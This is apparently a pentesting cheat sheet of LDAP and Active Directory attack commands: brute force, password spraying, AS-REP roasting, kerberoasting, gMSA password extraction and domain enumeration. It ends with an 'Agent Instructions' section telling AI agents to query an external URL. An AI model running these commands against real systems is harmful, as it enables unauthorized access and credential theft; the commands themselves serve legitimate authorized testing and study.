# LDAP | 389, 636

* GUI [jxplorer](http://jxplorer.org/)

```bash
 ## ------------------| Brute Force
 hydra -l UserName -P Passwordlist $IP ldap2 -V -f
```

## 01. ldapsearch

```bash
#  -x Simple Authentication
#  -D UserName
#  -w Password
#  -b Base site

## ------------------| Simple Auth
ldapsearch -x -H ldap://$IP 

## ------------------| Get LDAP Naming Context (DN)
ldapsearch -x -s base namingcontexts -H ldap://$IP

## ------------------| Enum 
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://$IP
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://$IP -D '<DOMAIN>\<USER>' -w 'PassWord'
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://$IP -D '<DOMAIN>\ldap' -w 'PassWord'

## ------------------| Queries
ldapsearch -x -H ldap://$IP -b "DC=htb,DC=local" '(objectClass=Person)'
ldapsearch -x -H ldap://$IP -b "DC=htb,DC=local" '(objectClass=User)' sAMAccountName | grep sAMAccountName  

## ------------------| Grep only domain admins
ldapsearch -x -H ldap://$IP -b "DC=HTB,DC=LOCAL"  -D '<DOMAIN>\<USER>' -w 'Ashare1972' "(&(ObjectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=htb,DC=local))" | grep sAMAccountName        

## ------------------| Extract users
ldapsearch -x -b "DC=HTB,DC=LOCAL" "*" -H ldap://$IP  | grep dn | awk -F\, '{print $1}' | awk -F\= '{print $2}'
-b "CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract computers
-b "CN=Computers,DC=<SUBDOMAIN>,DC=<TDL>"       

## ------------------| Extract self info
 -b "CN=<MY NAME>,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract Domain Admins
-b "CN=Domain Admins,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract Domain Users
-b "CN=Domain Users,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract Enterprise Admins
-b "CN=Enterprise Admins,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract Administrators
-b "CN=Administrators,CN=Builtin,DC=<SUBDOMAIN>,DC=<TDL>"

## ------------------| Extract Remote Desktop Group
-b "CN=Remote Desktop Users,CN=Builtin,DC=<SUBDOMAIN>,DC=<TDL>"      
```

## 02. [WindapSearch](https://github.com/ropnop/windapsearch)

```bash
## This tool is used to enumerating the domain via LDAP anonymous bind
/opt/windapsearch/windapsearch-linux-amd64 -d $IP -m users --proxy 127.0.0.1:1080     
```

## 03. [Kerbrute](https://github.com/ropnop/kerbrute)

```bash
## ------------------| User Enumarations
kerbrute userenum /usr/share/seclists/Usernames/Names/names.txt -d <domain> --dc $IP     
kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d <domain> --dc $IP     


## ------------------| Password Spray
kerbrute passwordspray usernames.txt -d <domain> --dc $IP 'password'

## ------------------| AS-REP Roasting
kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --downgrade -d <domain> --dc $IP > hashes.out 
```

## 04. NetExec

```bash
## ------------------| If an account exists without kerberos protocol
nxc ldap $IP -u users.txt -p '' -k

## ------------------| Perform ASREPRoasting Attack
sudo timedatectl set-timezone UTC
sudo systemctl stop systemd-timesyncd
sudo ntpdate 'domain'
nxc ldap $IP -u 'username' -p '' --asreproast asreproast.txt

## ------------------| Perform 
sudo timedatectl set-timezone UTC
sudo systemctl stop systemd-timesyncd
sudo ntpdate 'domain'
nxc ldap $IP -u 'username' -p 'password' --kerberoasting kerberoasting.txt

## ------------------| List available modules
nxc ldap $IP -u 'username' -p 'password' -L
nxc ldap $IP -u 'username' -p 'password' -M <moduleName> --options

## ------------------| Enumerate password policy.
nxc smb 10.10.10.161 --pass-pol
nxc smb 10.10.10.161 --pass-pol -u '' -p ''

## ------------------| Extract Self Information
nxc ldap $IP -u 'username' -p 'password' -M whoami

## ------------------| Extract Group Managed Service Account (gMSA) Passwords
nxc ldap $IP -u 'username' -p 'password' --gmsa

## ------------------| Enumerate Users Trusted for Delegation
nxc ldap $IP -u 'username' -p 'password' --trusted-for-delegation

## ------------------| Enumerate Users Without Passwords
nxc ldap $IP -u 'username' -p 'password' --password-not-required

## ------------------| Enumerate Accounts with Admin Count
nxc ldap $IP -u 'username' -p 'password' --admin-count

## ------------------| Enumerate Subnets
nxc ldap $IP -u 'username' -p 'password' -M subnets

## ------------------| Enumerate Domain Trusts
nxc ldap $IP -u 'username' -p 'password' -M enum_trusts

## ------------------| Check LDAP Signing Requirements
nxc ldap $IP -u 'username' -p 'password' -M ldap-checker

## ------------------| Run BloodHound
nxc ldap $IP -u 'username' -p 'password' --bloodhound --collection All --dns-server '<DNS_SERVER_IP>'

## ------------------| Enumerate All Users
nxc ldap $IP -u 'username' -p 'password' --users

## ------------------| Enumerate Active Users
nxc ldap $IP -u 'username' -p 'password' --active-users

## ------------------| Enumerate Computers
nxc ldap $IP -u 'username' -p 'password' -M find-computer -o TEXT="SQL"

## ------------------| Enumerate Domain 
nxc ldap $IP -u 'username' -p 'password' -M group-mem -o GROUP='Domain Admins'
nxc ldap $IP -u 'username' -p 'password' -M group-mem -o GROUP='Domain Users'           ## Enumerate Domain Users 
nxc ldap $IP -u 'username' -p 'password' -M group-mem -o GROUP='Administrators'         ## Enumerate Administrators
nxc ldap $IP -u 'username' -p 'password' -M group-mem -o GROUP='Enterprise Admins'      ## Enumerate Enterprise Admins
nxc ldap $IP -u 'username' -p 'password' -M group-mem -o GROUP='Remote Desktop Users'   ## Enumerate Remote Desktop Users

## ------------------| Enumerate Group Memberships
nxc ldap $IP -u 'username' -p 'password' -M groupmembership -o USER='<TARGET_USER>'
```

## 05. LDAPDomainDump

```bash
## ------------------| Only Json output
ldapdomaindump --no-grep --no-html -o ldapinfo $IP -u <domain>\\<username> -p <password>

## ------------------| Only HTML output
ldapdomaindump --no-json --no-grep -o ldapinfo $IP -u <domain>\\<username> -p <password> 
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.h4rithd.com/tcp/389-ldap.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.